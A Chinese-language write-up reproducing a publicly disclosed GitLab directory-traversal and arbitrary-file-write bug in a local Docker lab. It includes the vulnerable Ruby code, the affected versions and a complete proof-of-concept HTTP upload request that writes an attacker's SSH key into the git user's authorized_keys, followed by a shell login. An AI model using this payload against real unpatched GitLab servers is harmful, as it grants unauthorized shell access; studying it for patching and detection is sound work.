Gitlab远程代码执行漏洞

0x00前言

首发于先知论坛, 近期Hackerone公开了Gitlab的任意文件写入,导致远程代码执行漏洞,实践一波。

0x01漏洞描述

app/services/projects/gitlab_project_import_service.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# This service is an adapter used to for the GitLab Import feature, and
# creating a project from a template.
# The latter will under the hood just import an archive supplied by GitLab.
module Projects
class GitlabProjectsImportService
# ...

def execute
FileUtils.mkdir_p(File.dirname(import_upload_path))
FileUtils.copy_entry(file.path, import_upload_path)

Gitlab::ImportExport::ProjectCreator.new(params[:namespace_id],
current_user,
import_upload_path,
params[:path]).execute
end

# ...

def tmp_filename
"#{SecureRandom.hex}_#{params[:path]}"
end
end
end

import_upload_path将未过滤的参数params[:path]添加到gitlab上传目录,导致存在目录遍历,此外由于文件内容没有限制,最终导致任意内容写入任意文件。由于默认gitlab创建并启动了git账户,该账户默认目录为/var/opt/gitlab/,修改.ssh/authorized_keys文件为攻击者的公钥,即可以git用户身份成功登录服务器,从而导致命令执行。

影响版本

  • GitLab CE and EE 8.9.0 - 9.5.10
  • GitLab CE and EE 10.0.0 - 10.1.5
  • GitLab CE and EE 10.2.0 - 10.2.5
  • GitLab CE and EE 10.3.0 - 10.3.3

0x02漏洞利用复现

1. 环境搭建

利用docker搭建gitlab

1
docker run -d --name gitlab -p 80:80 -p 443:443 -p 2222:22  gitlab/gitlab-ce:10.2.4-ce.0

修改配置文件

1
2
3
4
5
6
7
8
9
docker exec -it gitlab /bin/bash
nano /etc/gitlab/gitlab.rb

# 去掉gitlab的注释并修改对应ip
external_url '192.168.1.100'
#重新载入配置文件
gitlab-ctl reconfigure
# 访问对应ip,第一次需要设置密码,并新建用户
http://192.168.1.100/

本地利用ssh-keygen生成公私钥对(用于攻击替换和登录)

2. POC及利用

  1. 登录gitlab->创建项目->Import project->GitLab Import->选择文件
    image
  2. 然后选择前面ssh-keygen生成的公钥(注意是公钥)

  3. 点击import project 后,burp修改path的值为/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys,数据包如下

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    POST /import/gitlab_project HTTP/1.1
    Host: 192.168.1.100
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------20787582420424
    Content-Length: 1214
    Referer: http://192.168.1.100/import/gitlab_project/new?namespace_id=2&path=
    Cookie: _gitlab_session=9c5f21dbfe98d90b1d992e1c9907584c; sidebar_collapsed=false
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------20787582420424
    Content-Disposition: form-data; name="utf8"

    ✓
    -----------------------------20787582420424
    Content-Disposition: form-data; name="authenticity_token"

    JoWtToPxTJL6RVASaprnR1hRqEGARnbLkA06favQLxQ7Y7YtyqfE9+JsbV/NAwy7XAdTuzgRsxJ/Kl1hH9V6xA==
    -----------------------------20787582420424
    Content-Disposition: form-data; name="namespace_id"

    {:value=>2}
    -----------------------------20787582420424
    Content-Disposition: form-data; name="path"

    ssh/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys
    -----------------------------20787582420424
    Content-Disposition: form-data; name="namespace_id"

    2
    -----------------------------20787582420424
    Content-Disposition: form-data; name="file"; filename="id_rsa.pub"
    Content-Type: application/vnd.ms-publisher

    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+McaRvLdnm+u30cACV4ftHJUESNVNV/VNlwm5xST343cFQODjBua5ffpCgDIejiVhyz9BzMmmynN5tnN6JQlx4SwSGkuR3+wzbJ8XKJNHLpOeZ2Xzw+UA9duDinDQHUklFwDmjH7Pywy6kRurIWXTsdupkLrHobEjSjrwEkqvLUnRi1EA/nU5es+kEz6c04jDUrZoGaj5GiI7VYReX+d9Pm524H9KfBpFIZ27yaWs1lR9b+dXjbXnUdysKdWTQcwy1tv+xhEbwF9m/PQajAEPPl95u/qrGPMqT0l08dC6H9o50i9Yn0Yf3t946g4QjGBs+GZgaNoLda8d5U5S8XLz BF@DESKTOP-4UM7GF4

    -----------------------------20787582420424--
  4. 发送请求后,使用用户名git以及生成的私钥登录gitlab服务器,如下是执行命令的demo

    1
    2
    $ id
    uid=998(git) gid=998(git) groups=998(git)

0x03参考链接

https://about.gitlab.com/2018/01/16/gitlab-10-dot-3-dot-4-released/
https://hackerone.com/reports/298873